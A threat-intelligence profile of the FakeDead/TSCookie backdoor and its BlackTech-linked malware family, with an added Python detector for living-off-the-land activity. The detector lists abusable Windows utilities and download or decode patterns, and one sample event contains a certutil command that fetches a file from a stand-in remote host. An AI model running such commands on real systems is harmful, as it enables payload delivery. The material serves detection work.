Fakedead

Malware profile, last updated 2024-05-04T18:12:40.003Z
FakeDead, also known as TSCookie, is a Windows backdoor used by BlackTech, a China-linked advanced persistent threat group. It is one member of a cluster of custom malware families deployed by the same operators, which also includes BendyBear, BIFROSE (Bifrost), BTSDoor, Consock, FlagPro, FrontShell (FakeDead's downloader module), IconDown, KIVARS, PLEAD, SpiderPig, SpiderSpring, SpiderStack, XBOW and WaterBear (also known as DBGPRINT). Delivery typically relies on phishing e-mail, malicious downloads or compromised websites, with FrontShell acting as the downloader stage that retrieves and installs FakeDead; once running, the backdoor gives the operators a remote foothold from which they collect and exfiltrate data. The operators have also shifted toward "living off the land", abusing native Windows utilities so that post-compromise activity blends into routine administration, and the CISA and vendor reports referenced below describe the same group persisting in modified router firmware. Because the tooling is shared across this cluster, an indicator for any one of these families is a reason to hunt for the others, and detection should not rest on file hashes alone: process-lineage and command-line telemetry for built-in utilities is where the living-off-the-land activity becomes visible.
Description last updated: 2023-10-11T02:52:46.044Z
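The living-off-the-land behaviour mentioned above is caught by process-creation telemetry rather than by file hashes. As an added example (not code from this profile, from BlackTech reporting or from any vendor), the Python below scores Sysmon-style process-creation records on three signals: a native utility commonly abused as an execution proxy, a user-facing parent such as a mail client or document viewer, and a command line that fetches or decodes a payload. The binary list, parent list, command-line heuristics and the sample events are assumptions constructed for illustration, not indicators taken from the page.

```python
"""Added example, not from the profile or any BlackTech report: a minimal
living-off-the-land detector over constructed Sysmon-style process-creation
records. All lists and heuristics below are the author's assumptions."""
import re
from typing import Dict, List

# Native Windows utilities often abused as execution or download proxies.
# Assumed list for illustration; extend from the LOLBAS project in practice.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe",
           "wmic.exe", "powershell.exe", "bitsadmin.exe", "cmstp.exe"}

# Parents that should rarely spawn LOLBins directly: user-facing document and
# mail handlers, relevant because the profile cites e-mail and download lures.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                       "acrord32.exe", "chrome.exe", "msedge.exe"}

# Command-line fragments that raise the score (assumed heuristics).
SUSPICIOUS_ARGS = [
    re.compile(r"https?://", re.I),             # remote fetch in arguments
    re.compile(r"-urlcache\b", re.I),           # certutil download switch
    re.compile(r"-enc(odedcommand)?\b", re.I),  # PowerShell base64 payload
    re.compile(r"\bscrobj\.dll\b", re.I),       # regsvr32 scriptlet load
    re.compile(r"\bjavascript:", re.I),         # rundll32/mshta inline script
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> int:
    """Return a 0-3 suspicion score for one process-creation event."""
    if basename(ev.get("Image", "")) not in LOLBINS:
        return 0
    score = 1  # a LOLBin ran at all
    if basename(ev.get("ParentImage", "")) in USER_FACING_PARENTS:
        score += 1  # spawned by a document/mail/browser process
    if any(p.search(ev.get("CommandLine", "")) for p in SUSPICIOUS_ARGS):
        score += 1  # command line fetches or decodes a payload
    return score


def detect(events: List[Dict[str, str]], threshold: int = 2) -> List[Dict[str, str]]:
    """Return events whose score meets the threshold, annotated with it."""
    hits = []
    for ev in events:
        s = score_event(ev)
        if s >= threshold:
            hits.append({**ev, "Score": str(s)})
    return hits


# Constructed sample events (Sysmon Event ID 1 fields, not real telemetry;
# 203.0.113.5 is a documentation address).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "CommandLine": r"rundll32.exe C:\Users\u\AppData\Local\Temp\a.dll,Start"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/x.dat x.dat"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["Score"], hit["CommandLine"])
```

With the default threshold the first two sample events are reported (Office spawning rundll32 with a DLL from a temp directory, and certutil pulling a remote file), while the benign rundll32 launch from svchost scores 1 and is suppressed. The score is deliberately additive rather than a single rule so that a lone LOLBin execution, which is common in healthy environments, does not alert on its own.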
Possible Aliases / Cluster overlaps
It is hard to track cluster overlaps and naming conventions between vendors, so here are some possibly overlapping names and profiles you may also want to look at (votes in parentheses; profile descriptions are truncated as displayed).

BendyBear (3): BendyBear is a sophisticated x64 shellcode malware that requires loader or code injection for deployment. It contains advanced features not typically found in shellcode, making it a potent threat to computer systems. BendyBear, along with other specific malware strains such as Bifrose, SpiderPig, an…

TSCookie (2): TSCookie is a malware that has been associated with various backdoors such as BendyBear, BIFROSE (Bifrost), Consock, KIVARS, PLEAD, XBOW, and Waterbear (DBGPRINT). It's also known as FakeDead and is used in conjunction with other tools like BendyBear and Flagpro by BlackTech, an advanced persistent…

Waterbear (2): WaterBear is a sophisticated form of malware, known for its ability to exploit and damage computer systems. It infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it can steal personal information, disrupt operations, or hold data hostag…
Miscellaneous Associations
Other elements of context that may help in assessing relevance: Downloader
Source Document References
Information about the FakeDead malware was read from the documents below (source, age at time of capture, title).

- CERT-EU, a year ago: China's BlackTech Hacking Group Exploited Routers to Target U.S. and Japanese Companies
- Securityaffairs, a year ago: China-linked APT BlackTech was spotted hiding in Cisco router firmware
- BankInfoSecurity, a year ago: Chinese Hackers Target Routers in IP Theft Campaign
- CISA, a year ago: People's Republic of China-Linked Cyber Actors Hide in Router Firmware | CISA